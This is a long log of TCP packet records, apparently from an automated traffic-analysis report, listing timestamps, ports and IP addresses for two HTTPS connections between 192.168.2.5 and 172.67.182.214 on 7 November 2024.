                                                                                                                                                                              Nov 7, 2024 18:04:46.028446913 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.028481007 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.028503895 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.028527021 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.028553963 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.043993950 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.044023037 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.044063091 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.044071913 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.044118881 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.049258947 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.049274921 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.049336910 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.049345970 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.089596033 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.100483894 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.100508928 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.100574017 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.100581884 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.100637913 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.147142887 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.147165060 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.147296906 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.147325993 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.147368908 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.162395954 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.162420988 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.162591934 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.162614107 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.162664890 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.163276911 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.163291931 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.163358927 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.163364887 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.163409948 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.198699951 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.198724031 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.198815107 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.198848963 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.198865891 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.198894978 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.219484091 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.219505072 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.219575882 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.219584942 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.219610929 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.219629049 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.280801058 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.280819893 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.280913115 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.280936956 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.280982971 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.281567097 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.281584978 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.281626940 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.281636000 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.281662941 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.281681061 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.308553934 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.308571100 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.308674097 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.308680058 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.308728933 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.337969065 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.337989092 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.338028908 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.338032961 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.338105917 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.380805016 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.380822897 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.380917072 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.380928993 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.380971909 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.400497913 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.400513887 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.400604010 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.400620937 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.400660992 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.401853085 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.401868105 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.401911020 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.401931047 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.401961088 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.401988029 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.428050041 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.428066969 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.428164005 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.428177118 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.428222895 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.457254887 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.457268953 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.457356930 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.457365036 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.457402945 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.503739119 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.503762007 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.503830910 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.503851891 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.503873110 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.503896952 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.519799948 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.519824028 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.519913912 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.519936085 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.519978046 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.520581007 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.520596981 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.520633936 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.520639896 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.520667076 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.520684958 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.547008038 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.547033072 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.547079086 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.547107935 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.547121048 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.547147989 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.576091051 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.576112032 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.576222897 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.576246023 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.576284885 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.622426987 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.622447968 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.622529984 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.622544050 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.622585058 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.678133011 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.678153038 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.678194046 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.678203106 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.678236008 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.678248882 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.678627014 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.678651094 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.678683043 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.678689003 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.678716898 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.678736925 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.679637909 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.679652929 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.679712057 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.679719925 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.679759979 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.680577040 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.680593014 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.680628061 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.680633068 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.680670023 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.680685997 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.736488104 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.736517906 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.736560106 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.736569881 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.736596107 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.736620903 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.792829037 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.792846918 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.792896032 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.792905092 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.792931080 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.792953968 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.793365955 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.793385029 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.793422937 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.793430090 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.793473005 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.793473005 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.793869019 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.793909073 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.793943882 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.793948889 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.793977022 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.793992043 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.796848059 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.796864986 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.796942949 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.796948910 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.796988964 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.813667059 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.813682079 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.813743114 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.813749075 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.813791990 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.859993935 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.860013008 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.860116005 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.860130072 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.860177040 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.911588907 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.911621094 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.911762953 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.911775112 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.911819935 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.912285089 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.912301064 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.912355900 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.912360907 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.912410975 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.912889957 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.912951946 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.912976027 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.913041115 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.913062096 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.913065910 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.913100958 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.913110971 CET44349764172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.913156033 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.916934013 CET49764443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.960412979 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.960465908 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:46.960525990 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.960980892 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:46.960998058 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.559712887 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.560864925 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:47.560890913 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.871000051 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.871083975 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.871119976 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.871153116 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:47.871154070 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.871174097 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.871229887 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:47.871336937 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.871839046 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.871892929 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:47.871901035 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.871942043 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:47.875792027 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.917738914 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:47.986361980 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.986447096 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.986490965 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.986541033 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:47.986557961 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.986604929 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.986605883 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:47.986618042 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.986664057 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:47.986713886 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.987181902 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.987221003 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.987230062 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:47.987237930 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.987293959 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.987299919 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:47.987307072 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.987355947 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:47.987369061 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.987946033 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.988004923 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.988051891 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.988059998 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:47.988069057 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.988097906 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:47.988387108 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:47.988792896 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:47.988918066 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:47.988923073 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.028978109 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.029093027 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.029102087 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.073852062 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.101499081 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.101558924 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.101604939 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.101646900 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.101660013 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.101697922 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.101706982 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.101716042 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.101763010 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.101769924 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.101805925 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.102394104 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.102448940 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.102451086 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.102459908 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.102488995 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.102524996 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.102571964 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.102576971 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.102612972 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.103097916 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.103157043 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.103245020 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.103296041 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.103914022 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.103976011 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.103980064 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.103990078 CET44349795172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:48.104017973 CET49795443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:48.104033947 CET44349795172.67.182.214192.168.2.5
